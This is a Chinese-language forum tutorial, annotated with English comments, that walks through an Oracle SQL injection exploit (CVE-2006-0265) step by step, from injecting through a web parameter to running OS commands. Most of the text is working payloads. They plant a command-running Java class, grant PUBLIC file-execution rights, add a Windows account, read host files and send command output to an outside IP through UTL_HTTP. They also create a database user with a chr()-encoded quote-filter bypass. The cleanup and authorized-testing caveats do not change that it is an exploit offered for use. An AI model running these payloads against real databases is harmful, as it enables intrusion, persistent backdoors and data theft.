
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL*Plus 里执行的。在 web 注入时，把 `select SYS.DBMS_EXPORT_EXTENSION.....` 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。（`||` 的优先级高于 `<>`，所以比较的是 '1' 和 'a'||(子查询结果)；后者总以 a 开头，即使子查询返回 NULL 也等于 'a'，条件恒为 true，页面照常返回，而注入的语句已经执行。）
语句有点长，可能要用 POST 提交。

安全说明：本文利用的是 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 的 SQL 注入漏洞（CVE-2006-0265，Oracle 2006 年 1 月的 CPU 已修复，受影响的是 8i/9i/10gR1 等未打该补丁的版本）。该包以定义者（SYS）权限运行，且在受影响版本里默认对 PUBLIC 授予了 EXECUTE，因此 web 应用所用的低权限数据库账号也能借它以 SYS 身份执行任意 DDL。前提是应用本身有注入点、且应用账号能执行该包；已打补丁或已 `revoke execute on sys.dbms_export_extension from public` 的库上，下面的语句会报错。下面各步都会在目标库/主机上留下持久改动，仅用于授权测试，并按文末的清理步骤回收。
以下是各个步骤：
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在 Oracle 上创建 Java 源 LinxUtil（DDL 以 SYS 身份执行，所以对象都建在 SYS 方案下，后面调用时要带 sys. 前缀），里面两个函数：runCMD 用于执行系统命令，readFile 用于读取文件：
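-- Step 1: create the Java source "LinxUtil". The DDL is executed through
-- SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (CVE-2006-0265), which runs with
-- SYS definer rights, so the object is created in the SYS schema.
-- Quoting is three levels deep: the function argument ('...'), the first EXECUTE IMMEDIATE
-- inside it (''...'') and the inner EXECUTE IMMEDIATE that carries the DDL (''''...'''').
-- Any string literal inside that DDL therefore needs eight quotes (see step 3).
-- The trailing -- comments out the rest of the statement the package builds itself.
-- runCMD only reads the process's stdout (getInputStream); stderr is dropped, so a failing
-- command comes back as an empty string rather than an error text. java.lang.Runtime
-- splits a single-String command on whitespace, hence the "cmd /c ..." form used later.
-- NOTE(review): this payload uses PUT(1); the chr()-encoded variant later in the post
-- uses PUT(:P1). If the call raises a bind error, try the :P1 form first.
-- The forum's copy-protection noise that was embedded in the original post has been
-- stripped; the first line is the injection prefix, the rest is the SQL in the parameter.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)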
------------------------
如果 URL 有长度限制，可以把 readFile() 函数块去掉，即：
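-- Step 1, short form for length-limited URLs: the same payload with readFile() removed.
-- If this variant is used, skip every LinxReadFile statement in steps 3 to 6.
-- Same three-level quoting and PUT(1) caveat as the full form above.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)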
同时把后面步骤提到的对 readFile() 的处理语句去掉。
------------------------------
2.赋 Java 权限（给 PUBLIC 授予 java.io.FilePermission <<ALL FILES>> 的 execute 权限，这是 Runtime.exec 能执行外部程序的前提；该授权持久记录在 DBA_JAVA_POLICY 中，所有数据库账号都因此获得从 Java 执行外部程序的能力，测试结束后应用 dbms_java.revoke_permission 撤销）
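-- Step 2: grant PUBLIC the Java permission Runtime.exec needs (java.io.FilePermission on
-- "<<ALL FILES>>" with action "execute"). This is a persistent change recorded in
-- DBA_JAVA_POLICY, and it lets every database account run OS binaries from Java.
-- Undo it with dbms_java.revoke_permission and the same four arguments.
-- The literals inside the inner DDL carry eight quotes because of the three nesting levels.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual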
3.创建函数
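-- Step 3a: expose LinxUtil.runCMD as the PL/SQL function SYS.LinxRunCMD.
-- The unquoted function name is folded to LINXRUNCMD in the data dictionary (that is the
-- spelling used by the existence check in step 5); the quoted Java source name
-- "LinxUtil" keeps its case.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual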
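-- Step 3b: expose LinxUtil.readFile as SYS.LinxReadFile (skip when the short form of
-- step 1 was used -- the Java method does not exist then). Folded to LINXREADFILE.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual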
4.赋 public 执行函数的权限（此后任何数据库账号都能以 Oracle 进程所属的操作系统账号执行命令；授权测试时建议只把 execute 授给应用账号，并在事后回收）
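-- Step 4: let every database account call both wrappers. From here on any account that
-- can run a query gets OS command execution as the OS user that owns the Oracle process
-- (the commands used later are Windows ones). For a function, ALL expands to EXECUTE
-- (and DEBUG); in an authorized test grant EXECUTE only, only to the application's
-- account, and revoke it afterwards. These grants vanish when the functions are dropped.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual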
5.测试上面的几步是否成功
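-- Step 5: boolean existence check for the two wrappers. The condition is true only when
-- the scalar subquery returns a row; with no row it yields NULL, the comparison is
-- UNKNOWN and the page behaves as for a false condition.
-- Fix: the original first check was written as '1'<>'11'||(...). Because 'a'||NULL is
-- 'a' in Oracle, that form is true whether or not the object exists and proves nothing;
-- both checks now use the plain '1'<>(...) form.
-- owner = 'SYS' avoids ORA-01427 (subquery returns more than one row) when another
-- schema happens to own an object with the same name. Names are upper case because the
-- CREATE FUNCTION statements used unquoted identifiers.
and '1'<>(
select  OBJECT_ID from all_objects where  owner = 'SYS' and object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  owner = 'SYS' and object_name ='LINXREADFILE'
)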
6.执行命令：（下面的 `net user linx /add` 会在数据库主机上真实创建一个系统账号；授权测试建议换成 `cmd /c whoami` 之类无副作用的命令，并把执行过的命令记入测试记录）
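-- Step 6: run a command and read a file through the SYS-owned wrappers (hence the sys.
-- prefix). This boolean form gives no output -- it only tells you the call did not error;
-- use the UNION or UTL_HTTP variants below to see results.
-- "net user linx /add" creates a local OS account on the database host: a persistent,
-- auditable change. In an authorized test prefer a non-modifying command such as
-- "cmd /c whoami" and record what was executed.
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)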
注意 sys.LinxReadFile() 返回的是 varchar2 类型，不能用 `and 1<>` 代替 `and '1'<>`（数字比较会把返回的文本隐式转成 NUMBER，非数字内容会报 ORA-01722）。
如果要查看运行结果可以用 union（注入的 select 列数和列类型要与原查询匹配，不够的列用 null 补齐）：
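-- In-band output via UNION: the command output becomes a result row of the page's own
-- query. The injected SELECT must match the original query's column count and types
-- (pad with NULLs); the post does not show that padding.
-- Running "net user linx /add" a second time fails because the account already exists;
-- a read-only command is the better demonstration here.
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual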
或者用 UTL_HTTP.request 把结果带外发送到自己控制的服务器：
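-- Out-of-band output via UTL_HTTP: the database host sends the command output or file
-- content as a GET parameter to a web server the tester controls.
-- 211.71.147.3 is the original author's collector. Never send a target's data to a host
-- you do not control -- point this at your own listener.
-- Fix: the original replaced '\n', which in Oracle is the two characters backslash and n,
-- not a newline. The Java wrappers join lines with a real LF, so chr(10) is what has to
-- be replaced; otherwise the URL is still invalid and the request fails.
-- Only space and LF are escaped here; other reserved characters in the output will still
-- break the URL (UTL_URL.ESCAPE handles them, where available).
-- Requires outbound HTTP from the database host (and a network ACL on 11g and later).
-- The second request now labels its data LinxReadFile: instead of re-using LinxRunCMD:.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)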
( [1 Z1 ~5 Q& k. z7 Z( A/ H注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。. e' r9 B( H8 e5 r9 p7 C3 r
--------------------
附：内部变化
通过以下语句可以查看注入对 all_objects 造成的改动（防守方排查此类入侵时同样适用；另外还应检查 DBA_JAVA_POLICY 中是否有对 PUBLIC 的 <<ALL FILES>> execute 授权，以及 DBA_TAB_PRIVS 中对 PUBLIC 的异常授权）：
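-- List the objects the injection left behind (attacker clean-up check, and a defender's
-- hunting query for this technique). Two patterns are needed: the function names were
-- folded to upper case, while the Java source/class keep the quoted mixed-case name
-- "LinxUtil". Explicit columns instead of SELECT * so the output is stable and readable.
-- Also check DBA_JAVA_POLICY for a PUBLIC grant on <<ALL FILES>> / execute and
-- DBA_TAB_PRIVS for grants to PUBLIC on these functions.
select owner, object_name, object_type, status, created
from all_objects
where object_name like '%LINX%' or object_name like '%Linx%'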
7.删除我们创建的函数（原帖只删了 LinxRunCMD；LinxReadFile、Java 源 LinxUtil 以及第 2 步给 PUBLIC 的 Java 权限也应一并清理）
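-- Step 7: cleanup. The original post only dropped LinxRunCMD and left everything else
-- from steps 1-4 on the target. The statements below remove all of it: both wrappers,
-- the Java source (dropping it also drops the class compiled from it), and the PUBLIC
-- java.io.FilePermission grant from step 2. The step-4 grants disappear with the
-- functions. Skip the LinxReadFile statement if the short form of step 1 was used.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil"  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual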
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 oracle 帐号（注意这是持久化的改动，会留在 DBA_USERS 里，测试完务必删除）：
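-- Alternative vulnerability check: create a throw-away database account as SYS.
-- A new account is a persistent, audited change (DBA_USERS); the all_objects check in
-- step 5 is the less intrusive test. If you must do this, use a strong unique password
-- rather than the account name, and drop the account afterwards.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual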
即（把整段参数用 chr() 拼出来，适用于引号被过滤的场景；注意这一版解码后用的是 PUT(:P1)，而上文明文版用的是 PUT(1)）：
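-- Same CREATE USER payload with every string argument built from chr() so that no
-- single quote appears in the request (for injection points that filter quotes).
-- Decoded, the third argument reads:
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;
--   BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
-- and the remaining arguments are 'SYS', 0, '1', 0. The quote doubling is one level
-- shallower than in the plain-text payloads because the text is no longer inside a SQL
-- string literal. Note this variant uses PUT(:P1), the plain-text ones above use PUT(1).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual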
确定漏洞存在（帐号建成功即说明注入以 SYS 权限执行了 DDL）：
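-- Confirm the account now exists. user_id is numeric, so a numeric comparison is fine
-- here (unlike the varchar2 results of the wrappers). No row -> NULL -> condition false.
-- The user name is upper case because CREATE USER used an unquoted identifier.
1<>(
select user_id from all_users where username='LINXSQL'
)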
给 linxsql 连接权限：
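-- Give the throw-away account CONNECT so it can log in directly (CONNECT is a role;
-- what it contains differs between Oracle versions). Drop the account afterwards.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual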
删除帐号:
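-- Remove the throw-away account. Note this statement uses PUT(:P1) while the earlier
-- plain-text payloads use PUT(1); the post is inconsistent about which form it relies on.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual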
======================
以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功返回数值 1。但它声明为 authid current_user（调用者权限），execute immediate 里的语句只以调用者（通过注入点调用时就是 web 应用的数据库账号）的权限执行，并不继承 SYS 的权限，所以通常只有 public 级别的权限，作用不大；真要用的话可以先用上面的方式 grant dba 给当前账号。它同样是留在 SYS 方案下的持久对象，测试后应 drop 掉：
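-- Helper that runs an arbitrary statement and returns 1. It is declared AUTHID
-- CURRENT_USER (invoker's rights), so the dynamic SQL runs with the privileges of whoever
-- calls it -- the application's account when called through the injection -- not with
-- SYS rights; that is why the post finds it of little use unless the calling account is
-- granted DBA first. It is nonetheless a persistent arbitrary-SQL gateway owned by SYS:
-- drop it after the test. This payload uses PUT(:P1), unlike the PUT(1) form of steps 1-4.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual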
)
（原帖在此处又贴了一段 `and ... 1.jsp?id=1 and '1'<>( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ...`，但在页面上被截断，`<>` 也被当作 HTML 标签吞掉，后半段缺失；看样子是想演示如何调用 Linx_query，原文已无法恢复。）